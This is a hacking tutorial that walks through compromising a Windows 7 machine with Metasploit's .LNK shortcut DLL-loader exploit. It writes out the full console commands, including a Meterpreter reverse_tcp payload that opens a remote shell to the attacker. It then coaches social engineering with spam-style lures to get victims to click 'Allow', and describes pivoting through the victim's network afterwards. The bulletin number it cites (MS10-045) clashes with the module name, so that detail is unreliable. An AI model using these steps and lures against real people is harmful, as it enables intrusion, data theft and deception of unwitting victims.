Let’s start by opening Metasploit. You can do that by using the menu system in BackTrack, or more simply, typing:
- bt > msfconsole
You will be greeted by a screen like this.
Step 2Load the Exploit
In this Windows 7 hack, we will be using an exploit that Microsoft numbers as MS10-045 in their Microsoft Security Bulletins and takes advantage of a buffer overflow in the shortcut dll. Let’s load it by typing:
- msf > use windows/ms10_046_shortcut_icon_dllloader
Step 3Get the Info
Now that we have it loaded in the Metasploit framework, let’s get more info on this exploit to better understand what we will be doing.
- msf > info
As we can read at the bottom, the developer of the exploit writes:
“This module exploits a vulnerability in the handling of Windows Shortcut file (.LNK) that contain an icon resource pointing to a malicious DLL.”
Essentially, we will be creating a shortcut file, that when clicked on by a gullible end user, will allow the execution of our malicious code.
Step 4Set the Options
With the exploit loaded and the knowledge of how it works, let’s set the required options. First, set the Payload. My preference is the great and powerful (sounds like Oz) Meterpreter.
- set PAYLOAD windows/meterpreter/reverse_tcp
Now we need to set the IP our our system as LHOST:
- set LHOST 192.168.1.111
Once we have these options set, we can simply type “exploit” to generate the exploit. Unlike some of our other remote exploits, what we’ve done here is generate a link and a server to host that link.
As you can see where I have highlighted in the above screenshot, Metasploit has generated the exploit and then started a server to host the exploit. Our job now is to get the victim to click on the link.
Step 5Send the Link to the Victim
We need to be creative here. This is the social engineering part of this hack. One way or another, we need to induce the victim to click on our link.
We’ve all seen those spam emails that claim to help us acquire a small fortune by working at home, grow our penises to proportions that would make a stallion envious, and apply for millions of dollars in unclaimed bank funds. Or, it could simply be something as innocent-sounding as watching a hilarious cat video. If we click on any of the links, we’re likely to become a victim of a hack like this one.
You might say “no one would be so gullible,” but in reality, there are billions of such gullible people. Some of the greatest hacks in history (RSA and NY Times come immediately to mind) have been accomplished this way. When all is said and done, I believe that the hackers who gained access to the credit cards numbers at Targetgained their foothold inside that network by getting one unwitting employee to click on a link such as this.
So…we have the link and the victim clicks on it like in the screenshot below.
Now, here is the crucial and tricky part…
The victim will be greeted by a security warning. The victim must “Allow” the code to run. Many, or probably most users will know better than to “Allow,” but it only requires one user of thousands to compromise an entire network. Make the link sound compelling enough and SOMEONE will click “Allow,” especially if it comes from someone they know or think they know and trust.
Step 6Sends the Exploit and Payload
When the victim clicks on the “Allow” prompt, Metasploit begins the process of establishing a client/server connection between you and the victim. This process is fairly slow, so be patient. In my experience, even on an unpatched Windows 7 system, it does not always work, so be persistent. Persistence and creativity are key attributes of a successful hacker.
If we have done everything correctly and the victim is vulnerable and naive, we will be greeted by the meterpreter prompt!
Now that we have control of this Windows 7 system, we can do just about anything we want with this computer. Far more importantly, if this machine is on a large network, we can pivot from it to take control of any other system on the network.